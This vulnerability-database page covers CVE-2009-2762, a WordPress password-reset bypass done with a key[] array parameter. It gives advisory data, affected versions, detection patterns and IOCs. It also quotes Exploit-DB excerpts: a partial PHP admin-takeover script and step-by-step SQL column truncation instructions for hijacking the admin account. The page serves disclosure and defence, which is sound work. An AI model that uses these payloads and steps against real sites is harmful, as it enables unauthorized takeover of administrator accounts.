CVE-2009-2762
published 2009-08-13CVE-2009-2762: wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator…
PriorityP259high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
19.64%
97.1th percentile
wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator, via a key[] array variable in a resetpass (aka rp) action, which bypasses a check that assumes that $key is not an array.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 2.8.3-2 (bookworm) | wordpress 2.8.3-2 (bookworm) |
| wordpress | wordpress | <= 2.8.3 | — |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect GET requests to wp-login.php where the 'key' parameter is supplied as an array (key[]) combined with action=rp or action=resetpass — this is the exact exploit vector for CVE-2009-2762. ↗
- →Alert on HTTP requests to /wp-login.php containing the query string pattern 'action=rp&key[]=' or 'action=resetpass&key[]=' as this is the proof-of-concept payload. ↗
- →Monitor for POST requests to /wp-login.php?action=register with a user_login value of 'admin' followed by a large number of space characters (%20) — indicative of the SQL column truncation attack variant. ↗
- →Flag HTTP requests bearing the User-Agent string 'WordpressAdminTakeover', which is hardcoded in the published exploit tool for the SQL column truncation admin takeover. ↗
- ·The password reset bypass (key[] array) only resets the password for the FIRST user in the database, which is typically but not guaranteed to be the administrator. ↗
- ·The SQL column truncation variant (CVE related to 2.6.1) requires user registration to be enabled on the target WordPress installation. ↗
- ·The core CVE-2009-2762 exploit requires no authentication and no prior steps — a single unauthenticated GET request is sufficient to trigger the password reset. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2009-2762: wordpress - wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a p...
vendor_debian·2009·CVSS 7.5
CVE-2009-2762 [HIGH] CVE-2009-2762: wordpress - wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a p...
wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator, via a key[] array variable in a resetpass (aka rp) action, which bypasses a check that assumes that $key is not an array.
Scope: local
bookworm: resolved (fixed in 2.8.3-2)
bullseye: resolved (fixed in 2.8.3-2)
forky: resolved (fixed in 2.8.3-2)
sid: resolved (fixed in 2.8.3-2)
trixie: resolved (fixed in 2.8.3-2)
GHSA
GHSA-fxw5-28xr-82fm: wp-login
ghsa_unreviewed·2022-05-02
CVE-2009-2762 [HIGH] GHSA-fxw5-28xr-82fm: wp-login
wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator, via a key[] array variable in a resetpass (aka rp) action, which bypasses a check that assumes that $key is not an array.
OSV
CVE-2009-2762: wp-login
osv·2009-08-13·CVSS 7.5
CVE-2009-2762 [HIGH] CVE-2009-2762: wp-login
wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator, via a key[] array variable in a resetpass (aka rp) action, which bypasses a check that assumes that $key is not an array.
No detection rules found.
Exploit-DB
WordPress Core 2.8.3 - Remote Admin Reset Password
exploitdb·2009-08-11
CVE-2009-2762 WordPress Core 2.8.3 - Remote Admin Reset Password
WordPress Core 2.8.3 - Remote Admin Reset Password
---
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
I. VULNERABILITY
WordPress get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
$action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....
line 370:
break;
case 'reset
Exploit-DB
WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation)
exploitdb·2008-09-10
CVE-2009-2762 WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation)
WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation)
---
#!/usr/bin/php
=5.2.1 you'll need to be as well, in case
# server is wp261_php520
# php-5.2.1/php createtables.php > wp261_php521
#
#-------------------------------------------------------------
$BLOG = $_SERVER['argv'][1];
echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";
if(!$BLOG) {
echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
exit;
}
$UA = "WordpressAdminTakeover";
$MBOX="wp".`ps|md5sum|head -c 8`;
$EMAIL="[email protected]";
echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
"[X] rainbow tables available\n" :
"[!] rainbow tables not found - this will be really slow\n";
set_time_limit(0);
ini_set("max_execution_time",0);
Exploit-DB
WordPress Core 2.6.1 - SQL Column Truncation
exploitdb·2008-09-07
CVE-2009-2762 WordPress Core 2.6.1 - SQL Column Truncation
WordPress Core 2.6.1 - SQL Column Truncation
---
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin x
email: your email
^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0114.htmlhttp://core.trac.wordpress.org/changeset/11798http://secunia.com/advisories/36237http://wordpress.org/development/2009/08/2-8-4-security-release/http://www.exploit-db.com/exploits/9410http://www.securityfocus.com/bid/36014http://www.securitytracker.com/id?1022707https://exchange.xforce.ibmcloud.com/vulnerabilities/52382http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0114.htmlhttp://core.trac.wordpress.org/changeset/11798http://secunia.com/advisories/36237http://wordpress.org/development/2009/08/2-8-4-security-release/http://www.exploit-db.com/exploits/9410http://www.securityfocus.com/bid/36014http://www.securitytracker.com/id?1022707https://exchange.xforce.ibmcloud.com/vulnerabilities/52382
2009-08-13
Published